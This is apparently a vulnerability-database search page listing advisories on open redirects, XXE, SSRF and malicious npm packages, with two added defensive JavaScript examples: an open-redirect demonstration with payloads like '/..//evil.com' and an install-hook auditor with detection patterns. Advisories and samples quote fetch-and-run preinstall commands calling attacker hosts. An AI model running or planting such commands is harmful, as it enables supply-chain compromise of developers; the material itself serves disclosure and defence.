Lucene search

19 matches found

CVE
added 4 days ago

CVE-2026-56326

Nuxt.js (versions 4.0.0–4.4.6 and 3.x up to 3.21.6) contains a server-side open redirect vulnerability in navigateTo due to improper validation of path-normalized payloads (e.g., /..//evil.com, /.//evil.com). Attackers can bypass external-host checks via path-normalization techniques to redirect ...

CVSS 6.1 | AI score 5.9 | EPSS 0.00197
Exploits: 0 | References: 4 | Affected software: 1
OSSF Malicious Packages
added 2026/06/16 10:30 p.m.

Malicious code in backoffice-charges-module (npm)

Source: amazon-inspector 047eb92a0e8bb401b2c205765616c9b4b715ee7cfd33d2e6ef9dc8d645b77f04 On every npm install, the preinstall lifecycle script node index.js > /dev/null 2>&1 silently HTTPS-POSTs a JSON payload to https://avamnrwqo7.rbmock.de...

AI score 5.8
Exploits: 0 | References: 4
Positive Technologies
added 2026/06/16 12:00 a.m.

PT-2026-51413

Name of the Vulnerable Software and Affected Versions Nuxt versions prior to 4.4.7 Nuxt versions prior to 3.21.7 Description Nuxt contains three security issues related to client-navigation URL handling via the navigateTo and reloadNuxtApp functions. First, a server-side open redirect exists in...

CVSS 6.1 | AI score 6 | EPSS 0.00197
Exploits: 0 | References: 16
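The two Nuxt entries above (CVE-2026-56326 and PT-2026-51413) describe one mechanism: a redirect target such as /..//evil.com or /.//evil.com passes a same-host check, but once the dot segments are normalised the path becomes the protocol-relative //evil.com, which a browser resolves to an external host. The JavaScript below is an added illustration written for this page, not Nuxt's code and not its navigateTo implementation; it assumes an application origin of https://app.example and uses Node's WHATWG URL parser to show the gap between the value that was validated and the value that is emitted, then a check that validates the emitted string. It also covers the backslash variant /\evil.com, which the advisories do not list.

```javascript
// Added illustration (not Nuxt's code) of the path-normalisation open redirect.
// Assumed application origin; every target is resolved relative to it.
const ORIGIN = "https://app.example";
const ORIGIN_HOST = new URL(ORIGIN).host;

// Parse a user-supplied redirect target relative to our origin (null if unparseable).
function parseTarget(target) {
  try { return new URL(target, ORIGIN); } catch { return null; }
}

// A same-host check on the parsed URL. The advisory payloads pass it:
// WHATWG parsing keeps the host and folds "/.." and "/." into the path.
function hostLooksLocal(target) {
  const u = parseTarget(target);
  return u !== null && u.host === ORIGIN_HOST;
}

// What a server emits in Location when it forwards the normalised path
// rather than the absolute URL it validated.
function locationFromPath(target) {
  const u = parseTarget(target);
  return u === null ? null : u.pathname + u.search + u.hash;
}

// Where a browser lands for a given Location value: "//evil.com" is
// protocol-relative, so it resolves to an external host.
function browserDestinationHost(location) {
  return new URL(location, ORIGIN).host;
}

// Hardened: reject explicit external origins, reject a path that became
// protocol-relative after normalisation, emit an absolute same-origin URL,
// and re-check the exact string that will be emitted.
function safeRedirect(target) {
  const u = parseTarget(target);
  if (u === null) return null;
  if (u.origin !== new URL(ORIGIN).origin) return null;
  if (u.pathname.startsWith("//")) return null;
  const emitted = u.href;
  if (new URL(emitted, ORIGIN).host !== ORIGIN_HOST) return null;
  return emitted;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const t of ["/..//evil.com", "/.//evil.com", "/\\evil.com", "/account?x=1"]) {
    const loc = locationFromPath(t);
    console.log(t, "| host check:", hostLooksLocal(t), "| Location:", loc,
      "| browser goes to:", loc === null ? null : browserDestinationHost(loc),
      "| safeRedirect:", safeRedirect(t));
  }
}
```

The point of the last function is that the check runs on the string that leaves the server, not on an intermediate representation; a server that validates the parsed URL and then writes only its pathname into the Location header is validating a different value from the one the browser sees.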
CVE
added 2026/06/11 5:18 p.m.

CVE-2026-47157

aiograpi (Python) before 0.9.10 accepted server-supplied signup challenge paths and built request URLs before validating that the paths were relative Instagram API paths. An attacker who can influence a challenge response (e.g., on a local network, via DNS, or via a proxy) could cause challenge h...

CVSS 6.5 | AI score 5.4 | EPSS 0.00195
Exploits: 0 | References: 4
OSV
added 2026/06/11 12:38 p.m.

MAL-2026-5645 Malicious code in sn-internal-test (npm)

Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

AI score 5.8
Exploits: 0 | References: 3
OSSF Malicious Packages
added 2026/06/09 5:44 p.m.

Malicious code in grateful-payments (npm)

Source: amazon-inspector 1a7a07a0a09ed8037058353b9b9b067e25e3cbe783eaab8d54276d490f823471 On npm install, the package's postinstall script src/canary.js performs a DNS lookup and HTTPS GET to the hardcoded host...

AI score 5.5
Exploits: 0 | References: 1
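All three npm entries on this page (backoffice-charges-module, sn-internal-test and grateful-payments) execute at install time through a preinstall or postinstall lifecycle script: one downloads a file with curl and runs it, one runs a bundled index.js with its output silenced, one runs a bundled canary script that beacons out. The check below is an added example, not the inspector's or any package's code: it audits a package.json for install-time hooks and flags the patterns those entries describe. The package.json objects, package names and URL in it are constructed for the example.

```javascript
// Added example: static audit of install-time lifecycle scripts in package.json.
// Not the scanner's or any package's code. The sample packages are constructed.

// npm runs these hooks during "npm install" with no further action by the user.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Each rule is a pattern over the script command plus the reason it is suspicious.
const RULES = [
  { id: "remote-fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i,
    why: "fetches remote content at install time" },
  { id: "runs-file", re: /\bnode\s+[^\s&|;]+\.[cm]?js\b/,
    why: "executes a bundled script" },
  { id: "inline-code", re: /\bnode\s+(-e|--eval)\b|\beval\(/,
    why: "evaluates inline code" },
  { id: "encoded", re: /\bbase64\b|\batob\(/i,
    why: "decodes obfuscated content" },
  { id: "silenced", re: /2>&1|>\s*\/dev\/null|\|\|\s*true\b/,
    why: "hides its own output or failure" },
];

// Hits that justify blocking the install outright rather than a manual review.
const BLOCKING = new Set(["remote-fetch", "inline-code", "encoded", "silenced"]);

// Audit one parsed package.json object; returns a verdict and per-hook findings.
function auditPackage(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const matched = RULES.filter((r) => r.re.test(cmd));
    findings.push({ hook, cmd, hits: matched.map((r) => r.id), reasons: matched.map((r) => r.why) });
  }
  let verdict = "clean";
  if (findings.length > 0) verdict = "review"; // any install hook deserves a look
  if (findings.some((f) => f.hits.some((h) => BLOCKING.has(h)))) verdict = "block";
  return { name: pkg.name, verdict, findings };
}

// Convenience wrapper for an unpacked package on disk (e.g. package/package.json).
function auditPackageFile(path) {
  const fs = require("node:fs");
  return auditPackage(JSON.parse(fs.readFileSync(path, "utf8")));
}

// Constructed samples modelled on the three entries; names and URL are placeholders.
const SAMPLES = [
  { name: "sample-dropper", version: "1.0.0",
    scripts: { preinstall: "curl https://c2.example.invalid/payload.js -o index.js && node index.js" } },
  { name: "sample-beacon", version: "1.0.0",
    scripts: { preinstall: "node index.js > /dev/null 2>&1" } },
  { name: "sample-canary", version: "1.0.0",
    scripts: { postinstall: "node src/canary.js" } },
  { name: "sample-benign", version: "1.0.0",
    scripts: { test: "node --test", build: "tsc -p ." } },
];

function auditSamples() {
  return SAMPLES.map(auditPackage);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of auditSamples()) {
    const detail = r.findings.map((f) => `${f.hook}: ${f.hits.join(",") || "-"}`).join("; ");
    console.log(`${r.name}: ${r.verdict}${detail ? " (" + detail + ")" : ""}`);
  }
}
```

Run auditPackageFile over the unpacked tarball before the package is allowed into a build; a "review" verdict (an install hook with no blocking pattern, like the canary sample) still needs a human to read the script it points at, because the network call can live in the file rather than in the command line. Independently, npm's --ignore-scripts option stops lifecycle hooks from running at all, at the cost of breaking packages that legitimately build in postinstall.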
NVD
added 2026/06/09 5:16 a.m.

CVE-2026-41844

A Spring MVC or Spring WebFlux application which configures a mapping for "/**" where the view name is not explicitly specified allows an attacker to craft a link resulting in a 302 redirect to an arbitrary external host via the redirect: prefix. Affected versions: Spring Framework 7.0.0 through...

CVSS 6.1 | EPSS 0.00134
Exploits: 0 | References: 1
CVE
added 2026/06/09 3:50 a.m.

CVE-2026-41844

The CVE-2026-41844 entry concerns Spring Framework components Spring MVC and Spring WebFlux. Affected are Spring Framework versions 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; and 5.3.0–5.3.48. Description: when an application configures a mapping for "/**" and the view name is not explicitly specif...

CVSS 6.1 | AI score 5.6 | EPSS 0.00134
Exploits: 0 | References: 1 | Affected software: 1
EUVD
added 2026/06/09 3:50 a.m.

EUVD-2026-35332

A Spring MVC or Spring WebFlux application which configures a mapping for "/**" where the view name is not explicitly specified allows an attacker to craft a link resulting in a 302 redirect to an arbitrary external host via the redirect: prefix. Affected versions: Spring Framework 7.0.0 through...

CVSS 4.2 | AI score 5.6 | EPSS 0.00134
Exploits: 0 | References: 1
RedhatCVE
added 2026/05/11 8:27 p.m.

CVE-2023-42346

Alkacon OpenCms before 16 allows XXE when the <!DOCTYPE> refers to an external host...

CVSS 7.5 | AI score 5.8 | EPSS 0.00232
Exploits: 0 | References: 1
OSV
added 2026/05/08 6:32 a.m.

GHSA-PJ6P-9P8X-5MFC Alkacon OpenCms is vulnerable to XXE when the <!DOCTYPE> refers to an external host

Alkacon OpenCms before 16 allows XXE when the <!DOCTYPE> refers to an external host...

CVSS 7.5 | AI score 5.8 | EPSS 0.00232
Exploits: 0 | References: 3
CVE
added 2026/05/08 12:00 a.m.

CVE-2023-42346

CVE-2023-42346 affects Alkacon OpenCms before version 16, where an external-hosted DOCTYPE can trigger a server-side XML External Entity (XXE) vulnerability. The root cause is improper handling of external entities in XML processing, leading to potential exposure of confidential data (CVSS 3.1 ba...

CVSS 7.5 | AI score 5.8 | EPSS 0.00232
Exploits: 0 | References: 1
ATTACKERKB
added 2026/05/08 12:00 a.m.

CVE-2023-42346

Alkacon OpenCms before 16 allows XXE when the <!DOCTYPE> refers to an external host...

AI score 5.8 | EPSS 0.00232
Exploits: 0 | References: 2
RedhatCVE
added 2025/05/22 5:51 p.m.

CVE-2020-12772

An issue was discovered in Ignite Realtime Spark 2.8.3 and the ROAR plugin for it on Windows. A chat message can include an IMG element with a SRC attribute referencing an external host's IP address. Upon access to this external host, the NTLM hashes of the user are sent with the HTTP request. Th...

CVSS 8.8 | AI score 6.8 | EPSS 0.0174
Exploits: 1
AstraLinux
added 2025/02/11 7:35 a.m.

Astra Linux – Vulnerability in Linux 6.1

In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Avoid memcpy field-spanning write warnings When the “storcli2 show” command is executed for eHBA-9600, the mpi3mr driver prints this warning message: memcpy: A field-spanning write size 128 was detected in the singl...

CVSS 5.5 | AI score 6.1 | EPSS 0.00228
Exploits: 0 | References: 3
Veracode
added 2023/03/22 12:44 a.m.

Server-side Request Forgery (SSRF)

cairosvg is vulnerable to Server-side Request Forgery (SSRF) and Denial of Service (DoS). The vulnerability is due to allowing the loading of external host resources by default during parsing, allowing an attacker to supply a maliciously crafted file that references an external resource, resulting in Server-side...

CVSS 9.9 | AI score 6.6 | EPSS 0.00722
Exploits: 0 | References: 4 | Affected software: 2
CNNVD
added 2022/09/12 12:00 a.m.

Micro-Star International MSI Feature Navigator v1.0.1808.0901 Security Vulnerability

Micro-Star International MSI Feature Navigator is a feature navigator from Micro-Star International (China). A security vulnerability exists in Micro-Star International MSI Feature Navigator version v1.0.1808.0901. An attacker can exploit this vulnerability to download arbitrary files from an...

CVSS 7.1 | AI score 6.7 | EPSS 0.00322
Exploits: 3 | References: 4
Prion
added 2020/05/12 8:15 p.m.

Design/Logic Flaw

An issue was discovered in Ignite Realtime Spark 2.8.3 and the ROAR plugin for it on Windows. A chat message can include an IMG element with a SRC attribute referencing an external host's IP address. Upon access to this external host, the NTLM hashes of the user are sent with the HTTP request. Th...

CVSS 6.8 | AI score 8.5 | EPSS 0.0174
Exploits: 1 | References: 1 | Affected software: 1
Hacker One
added 2018/07/04 8:40 a.m.

Mail.ru: molotok.m.mail.ru delegated to external entity

SDC bypass / secure-cookie access vulnerability in m.mail.ru due to a subdomain name pointing to an uncontrolled external host...

AI score 2.1
Exploits: 0